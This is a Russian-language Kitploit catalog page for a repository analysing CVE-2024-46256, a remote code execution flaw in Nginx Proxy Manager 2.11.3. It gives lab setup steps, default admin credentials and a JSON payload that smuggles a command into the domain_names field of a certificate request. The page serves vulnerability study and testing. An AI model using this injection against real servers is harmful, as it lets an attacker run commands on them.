Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-46256 — CVE-2024-46256 инструмент | Kitploit
Инструменты/GitHubGitHub/kimtangker/cve-2024-46256
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubkimtangker/cve-2024-46256

CVE-2024-46256

CVE-2024-46256 инструмент

Репозиторий
810 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-46256 Анализ уязвимости RCE в Nginx Proxy Manager

Настройка окружения

1. Запуск среды Nginx Proxy Manager 2.11.3

root@kitploit:~

docker-compose up -d

Или можно использовать автоматический скрипт:

root@kitploit:~

python setup_environment.py

2. Доступ к Nginx Proxy Manager

  • URL: http://localhost:81
  • После завершения начальной настройки проведите тестирование
  • Войдите под учетной записью администратора по умолчанию (email: [email protected] / пароль: changeme)
  • Проверьте права доступа к функциям выдачи сертификатов

Информация об уязвимости

  • CVE ID: CVE-2024-46256
  • Продукт: Nginx Proxy Manager
  • Версия: 2.11.3
  • Тип уязвимости: Remote Code Execution (RCE)
  • CVSS: High
  • Код PoC

    PoC показывает, как аутентифицированный пользователь может вызвать RCE путем внедрения шаблонов/команд в поле доменного имени в процессе запроса на выдачу сертификата (например, Let's Encrypt).

    Пример полезной нагрузки (концептуальный пример):

    root@kitploit:~
    {
      "domain_names": ["test.com\"||{command}||\\n test.com\""],
      "meta": {
        "dns_challenge": false,
        "letsencrypt_agree": true,
        "letsencrypt_email": "[email protected]"
      },
      "provider": "letsencrypt"
    }
    

    Среда анализа

    • ОС: Windows 10
    • Docker: последняя версия
    • Nginx Proxy Manager: 2.11.3
    Скачать инструмент